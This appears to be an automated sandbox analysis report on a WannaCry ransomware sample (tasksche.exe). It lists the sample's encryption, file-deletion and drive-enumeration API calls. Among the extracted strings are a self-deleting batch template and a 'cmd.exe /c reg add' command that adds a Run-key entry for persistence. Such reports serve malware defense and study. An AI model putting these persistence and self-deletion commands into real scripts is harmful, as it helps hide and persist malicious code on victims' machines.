    Strings
    • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10001146
    • %sdel /a %%0, xrefs: 100011A0
    • %d%d.bat, xrefs: 1000116B
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
      • Part of subcall function 10001360: CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
      • Part of subcall function 10001360: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
    • GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
    • sprintf.MSVCRT ref: 100048F0
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • CreateProcessA.KERNEL32 ref: 1000495F
    • CloseHandle.KERNEL32(?), ref: 10004975
    • CloseHandle.KERNEL32(?), ref: 1000497C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • wcslen.MSVCRT ref: 10002BD9
    • EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
    • wcslen.MSVCRT ref: 10002C15
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
    • ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10003810: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
      • Part of subcall function 10003810: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
      • Part of subcall function 10003810: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
      • Part of subcall function 10003810: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
      • Part of subcall function 10003810: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
      • Part of subcall function 10003810: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
      • Part of subcall function 10003810: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
    • LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
    • ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
    • LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10003010: GetFileAttributesW.KERNEL32(?,768ED335,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
      • Part of subcall function 10003010: SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
      • Part of subcall function 10003010: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
      • Part of subcall function 10003010: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1000308A
      • Part of subcall function 10003010: GetFileSizeEx.KERNEL32(00000000,?,00000000), ref: 100030AA
      • Part of subcall function 10003010: SetFilePointer.KERNEL32(00000000,FFFFFC00,00000000,00000002), ref: 1000314C
      • Part of subcall function 10003010: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000316F
      • Part of subcall function 10003010: FlushFileBuffers.KERNEL32(00000000), ref: 10003176
      • Part of subcall function 10003010: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 10003183
      • Part of subcall function 10003010: WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 100031C8
      • Part of subcall function 10003010: CloseHandle.KERNEL32(00000000), ref: 100031EA
    • wcslen.MSVCRT ref: 10002D04
    • DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    Strings
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100014AE
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
      • Part of subcall function 10006640: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006659
      • Part of subcall function 10006640: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006669
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    • GlobalFree.KERNEL32(?), ref: 10001797
    • GlobalFree.KERNEL32(?), ref: 100017C0
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100017E3
    • CloseHandle.KERNEL32(?), ref: 100017F0
    • DeleteCriticalSection.KERNEL32(?,?,00000000,100016B2,76E6C426,76E6EA18,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 10001807
    • wcslen.MSVCRT ref: 10001814
    • DeleteFileW.KERNEL32(?,76E6DE72), ref: 10001822
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003AC0: CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
    • GlobalAlloc.KERNEL32(00000000,00100000,10005340,00000000,76E6C426,00000000,1000580C,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10001869
    • GlobalAlloc.KERNEL32(00000000,00100000), ref: 10001881
    • InitializeCriticalSection.KERNEL32(?), ref: 10001899
    • CreateThread.KERNEL32(00000000,00000000,100029E0,?,00000000,00000000), ref: 100018AD
    • GetTickCount.KERNEL32 ref: 100018CD
    • srand.MSVCRT ref: 100018D4
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetLogicalDrives.KERNEL32 ref: 10005734
    • Sleep.KERNEL32(00000BB8), ref: 1000574A
    • GetLogicalDrives.KERNEL32 ref: 10005752
    • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
    • CloseHandle.KERNEL32(00000000), ref: 1000579A
    • ExitThread.KERNEL32 ref: 100057B1
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • time.MSVCRT ref: 100049A8
    • time.MSVCRT ref: 100049CC
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 10004890: GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
      • Part of subcall function 10004890: sprintf.MSVCRT ref: 100048F0
      • Part of subcall function 10004890: CreateProcessA.KERNEL32 ref: 1000495F
      • Part of subcall function 10004890: CloseHandle.KERNEL32(?), ref: 10004975
      • Part of subcall function 10004890: CloseHandle.KERNEL32(?), ref: 1000497C
    • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 10004A15
      • Part of subcall function 100047F0: sprintf.MSVCRT ref: 10004863
    • Sleep.KERNEL32(00007530), ref: 10004A29
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • sprintf.MSVCRT ref: 10004528
    • GetFileAttributesA.KERNEL32(?), ref: 1000453C
    • GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
      • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,76E76DBE,10004558), ref: 10003A28
      • Part of subcall function 10003D10: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,76E76DBE,00000000), ref: 10003E2B
      • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003E3B
      • Part of subcall function 10003D10: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,76E76DBE,00000000), ref: 10003E70
      • Part of subcall function 10003D10: strncmp.MSVCRT(00000000,76E76DBE,?,?,?,?,?,76E76DBE,00000000), ref: 10003EA1
      • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003EB4
      • Part of subcall function 10003A60: DeleteCriticalSection.KERNEL32(?,100045A2), ref: 10003A6A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
      • Part of subcall function 10001360: CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
      • Part of subcall function 10001360: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
      • Part of subcall function 100014A0: GetComputerNameW.KERNEL32(?,?), ref: 100014D6
      • Part of subcall function 100014A0: wcslen.MSVCRT ref: 100014EE
      • Part of subcall function 100014A0: wcslen.MSVCRT ref: 1000150E
      • Part of subcall function 100014A0: srand.MSVCRT ref: 10001518
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001527
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001548
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001564
    • sprintf.MSVCRT ref: 10004863
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    • M, xrefs: 10004819
    • L, xrefs: 10004814
    • cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f, xrefs: 1000485D
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100047FD
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10002200: wcscpy.MSVCRT ref: 1000222D
      • Part of subcall function 10002200: wcsrchr.MSVCRT ref: 10002236
      • Part of subcall function 10002200: _wcsicmp.MSVCRT ref: 1000224B
      • Part of subcall function 10002200: wcscpy.MSVCRT ref: 1000225E
      • Part of subcall function 10002200: wcscat.MSVCRT ref: 1000226F
      • Part of subcall function 10002200: swprintf.MSVCRT(?,%s%s,?,.WNCYR,?,?,?,?), ref: 10002291
      • Part of subcall function 10002200: GetFileAttributesW.KERNEL32(?), ref: 1000229F
      • Part of subcall function 10002200: DeleteFileW.KERNEL32(?,?,?,?), ref: 100022C3
    • wcscat.MSVCRT ref: 1000298D
    • wcscat.MSVCRT ref: 1000299B
    • DeleteFileW.KERNEL32(?), ref: 100029B2
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 100011D0: GetCurrentProcess.KERNEL32 ref: 100011E4
      • Part of subcall function 100011D0: OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
      • Part of subcall function 100011D0: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 10001214
      • Part of subcall function 100011D0: GetLastError.KERNEL32 ref: 1000121A
      • Part of subcall function 100011D0: GlobalAlloc.KERNEL32(00000040,?), ref: 10001234
      • Part of subcall function 100011D0: GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 1000124E
      • Part of subcall function 100011D0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 1000125F
      • Part of subcall function 100011D0: GetProcAddress.KERNEL32(00000000,ConvertSidToStringSidW), ref: 10001275
      • Part of subcall function 100011D0: wcscpy.MSVCRT ref: 100012AB
      • Part of subcall function 100011D0: GlobalFree.KERNEL32(00000000), ref: 100012B9
    • GetUserNameW.ADVAPI32 ref: 10001321
    • _wcsicmp.MSVCRT ref: 10001331
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
      • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
      • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
      • Part of subcall function 10005060: swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
      • Part of subcall function 10005060: CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
      • Part of subcall function 10005060: sprintf.MSVCRT ref: 100050FE
    • swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
    • DeleteFileW.KERNEL32(?), ref: 10005174
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • wcscpy.MSVCRT ref: 10001920
    • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 10002300: ??2@YAPAXI@Z.MSVCRT ref: 10002332
      • Part of subcall function 10002300: swprintf.MSVCRT ref: 10002388
      • Part of subcall function 10002300: FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002442
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002459
      • Part of subcall function 10002300: swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
      • Part of subcall function 10002300: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
      • Part of subcall function 10002300: wcslen.MSVCRT ref: 100024CC
      • Part of subcall function 10002300: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
      • Part of subcall function 10002300: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002535
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 1000254C
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002563
      • Part of subcall function 10002300: wcsncpy.MSVCRT ref: 100025D7
      • Part of subcall function 10002300: wcsncpy.MSVCRT ref: 100025EE
      • Part of subcall function 10002300: FindNextFileW.KERNELBASE(?,?), ref: 10002634
      • Part of subcall function 10002300: FindClose.KERNEL32(?), ref: 10002643
      • Part of subcall function 10002300: _wcsnicmp.MSVCRT ref: 100026A7
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002772
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100027A2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100027BC
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000298D
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000299B
      • Part of subcall function 10002940: DeleteFileW.KERNEL32(?), ref: 100029B2
    • ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002BD9
      • Part of subcall function 10002BA0: EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002C15
      • Part of subcall function 10002BA0: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
      • Part of subcall function 10002BA0: ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
      • Part of subcall function 10002BA0: ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002D04
      • Part of subcall function 10002BA0: DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
    • ??3@YAXPAX@Z.MSVCRT ref: 100028FD
    • ??3@YAXPAX@Z.MSVCRT ref: 10002917
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,76E6C426), ref: 100054B6
    • wcslen.MSVCRT ref: 100054C3
    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
    • wcslen.MSVCRT ref: 100054FC
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
